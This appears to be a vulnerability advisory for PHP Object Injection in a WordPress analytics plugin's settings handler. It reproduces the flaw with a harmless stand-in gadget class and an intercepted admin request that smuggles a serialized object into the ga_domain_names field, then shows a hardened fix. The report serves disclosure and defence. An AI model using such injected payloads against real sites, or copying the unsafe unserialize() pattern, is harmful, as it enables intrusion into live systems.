The plugin unserializes user input provided via its settings, which could allow high-privilege users such as an admin to perform PHP Object Injection when a suitable gadget is present.

To simulate a gadget chain, put the following code in a plugin:

```php
class Evil {
    public function __wakeup(): void {
        die("Arbitrary deserialization");
    }
}
```

Activate and access the plugin, then select the "Continue Without Authentication" button. Click the "Save Changes" button, intercept this request and add the parameter `ga_domain_names` with the content `O:4:"Evil":0:{}` to the request body. Then view the response to the request, which will contain the "Arbitrary deserialization" message.

```http
POST /wp-admin/admin.php?page=google-analyticator HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8888/wp-admin/admin.php?page=google-analyticator
Content-Type: application/x-www-form-urlencoded
Content-Length: 638
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

_wpnonce=f83b45cab0&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dgoogle-analyticator&ga_status=disabled&ga_uid=UA-XXXXXXXX-X&ga_analytic_snippet=disabled&key_ga_show_ad=1&info_update=Save+Changes&ga_annon=0&ga_admin_status=enabled&ga_admin_role%5B%5D=administrator&ga_admin_disable=remove&ga_admin_disable_DimentionIndex=&ga_enable_remarketing=0&key_ga_track_login=0&ga_outbound=enabled&ga_event=enabled&ga_enhanced_link_attr=disabled&ga_downloads=&ga_outbound_prefix=outgoing&ga_downloads_prefix=download&ga_adsense=&ga_extra=&ga_extra_after=&ga_widgets=enabled&ga_dashboard_role%5B%5D=administrator&ga_domain_names=O:4:"Evil":0:{};
```
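As an added example (not the plugin's own code), the settings handler below shows the unsafe `unserialize()` call beside a hardened version that refuses to instantiate any class and validates the result as a plain list of domain names; the `ga_domain_names` parameter comes from the report, and the function names and the regex are assumptions.

```php
<?php
// Added example, not the plugin's code: a settings handler that receives a
// serialized list of domain names from the "ga_domain_names" POST parameter.

class Evil {
    // Stand-in for the gadget used in the report's proof of concept.
    public function __wakeup(): void { die("Arbitrary deserialization"); }
}

// Vulnerable form: every class named in the serialized string is instantiated,
// so its __wakeup()/__destruct() magic methods run on untrusted input.
function load_domain_names_vulnerable(string $raw): array {
    $value = unserialize($raw);
    return is_array($value) ? $value : [];
}

// Hardened form: allowed_classes => false (PHP 7.0+) turns each object token
// into __PHP_Incomplete_Class without calling any magic method; the decoded
// value is then validated as a list of hostname-like strings, which is all
// this setting needs to hold.
function load_domain_names_hardened(string $raw): array {
    $value = @unserialize($raw, ['allowed_classes' => false]);
    if (!is_array($value)) {
        return [];
    }
    $clean = [];
    foreach ($value as $item) {
        // Assumed validation rule: letters, digits, dots and hyphens only.
        if (is_string($item) && preg_match('/^[a-z0-9.-]+$/i', $item)) {
            $clean[] = $item;
        }
    }
    return $clean;
}

// Constructed inputs: a legitimate value and the payload from the report.
$legit   = serialize(['example.com', 'shop.example.com']);
$payload = 'O:4:"Evil":0:{}';

var_dump(load_domain_names_hardened($legit));   // both domains are kept
var_dump(load_domain_names_hardened($payload)); // empty array, __wakeup() never runs
// load_domain_names_vulnerable($payload) would terminate the script inside Evil::__wakeup().
```

Where the setting only ever holds scalars or arrays of scalars, storing it as JSON (or as a sanitized string list) removes the `unserialize()` call altogether.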